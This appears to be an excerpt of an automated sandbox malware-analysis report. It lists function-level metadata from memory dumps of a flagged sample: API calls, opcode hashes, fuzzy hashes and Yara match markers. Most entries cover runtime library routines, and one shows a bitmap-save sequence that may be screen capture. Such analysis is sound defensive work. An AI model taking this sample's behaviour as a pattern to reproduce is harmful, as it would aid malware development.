                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                        • String ID: fJ@
                                                                                                                                                                                                                                        • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                        • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                        • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                        • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID: pScheduler
                                                                                                                                                                                                                                        • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                        • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                        • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                        • String ID: MOC$RCC$v)D
                                                                                                                                                                                                                                        • API String ID: 3472968176-3108830043
                                                                                                                                                                                                                                        • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                        • Instruction ID: f056316da3880de9c1bba99a6440414b2aa7c225cfaa235483e429618d448be6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8F08C31A80264CFEB16EF64C40466C3B76BF0AB08F458091F4085B264CBB84A58CFA1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                        • Instruction ID: c1b067d8dd5c4cbaa073c0a3d0fc2a94e727558fa04a59abf97f0bd615b71a17
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE71C371D882169BCB258F59C884ABFFB75FF4531CF594629E4199B180DF70CA42CBA0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                        • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                                        • Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                                                                                                                                                                                                        • Instruction ID: 83541776387f045e54bfb015b11826f36572d70be14c8cb656854d5bd3707b88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D519071A80714EFDB25DF69D881B6AB7F5EF4C724B1405A9EC29D7250E732E901CB80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00430B4F
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00430B66
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00430B85
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00430BA0
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00430BB7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                                        • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                        • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                        • Instruction ID: 0ea6e3ee7efe9479a674c2c93f6622d7c4a2d5bc1283b0b774611bd10c29da33
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B441CF36A40214EFCB25DF78C880B5EB7E6EF89714B1545A9D929EB391D731E901CB80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                        • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                          • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 313313983-0
                                                                                                                                                                                                                                        • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                        • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _SpinWait.LIBCONCRT ref: 0213B152
                                                                                                                                                                                                                                          • Part of subcall function 02131188: _SpinWait.LIBCONCRT ref: 021311A0
                                                                                                                                                                                                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0213B166
                                                                                                                                                                                                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0213B198
                                                                                                                                                                                                                                        • List.LIBCMT ref: 0213B21B
                                                                                                                                                                                                                                        • List.LIBCMT ref: 0213B22A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3281396844-0
                                                                                                                                                                                                                                        • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                        • Instruction ID: 6d5143f7d9768fafb62a8399229f74f1e6f0d87856bea6590b3ecb6b789464af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F316872D88616EFCB16EFA4D9806EDBBB3BF04308F05416AC81177641EB716A18CB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                          • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                        • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                        • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3281396844-0
                                                                                                                                                                                                                                        • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                        • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                        • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                        • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2357751836-0
                                                                                                                                                                                                                                        • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                        • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 021250A3
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021250B7
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 0212511C
                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 0212512B
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0212513B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2395760641-0
                                                                                                                                                                                                                                        • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                        • Instruction ID: 7964ea037ca85516b3ea810b4f11b8789bbeb30e667e06ab85442c7c8a63071f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F821AF71894268EFDB04EFA4C4847DCBBB2FF50725F50800AF085AB280DB745568CF95
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(0212DAD7,0212DAD7,00000002,0214ED35,02153951,00000000,?,02146A05,00000002,00000000,00000000,00000000,?,0212CF88,0212DAD7,00000004), ref: 021521CA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021521FF
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02152226
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0212DAD7), ref: 02152233
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0212DAD7), ref: 0215223C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                        • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                        • Instruction ID: e840d4f8b1978bdcfc8cb6c4ced8781480f2ca46fdd6a0731cb8064ea5571d1b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8001F93B2C5720FF93162B345C88E1B266EABD177272101F9FC35D3290EFB089058569
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                        • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                        • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021521A0
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                        • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                        • Instruction ID: dcd9c53eddf64fe3f4c22905eddcbe51db6864f5fe605f0599e44cc774b0d0ae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F0A9371C4620FFD2162734AC88B1B266A5FC2F72F1501A5FD3892290EF7185058569
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                        • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                        • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 021329A4: TlsGetValue.KERNEL32(?,?,02130DC2,02132ECF,00000000,?,02130DA0,?,?,?,00000000,?,00000000), ref: 021329AA
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02137BB1
                                                                                                                                                                                                                                          • Part of subcall function 0214121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02141241
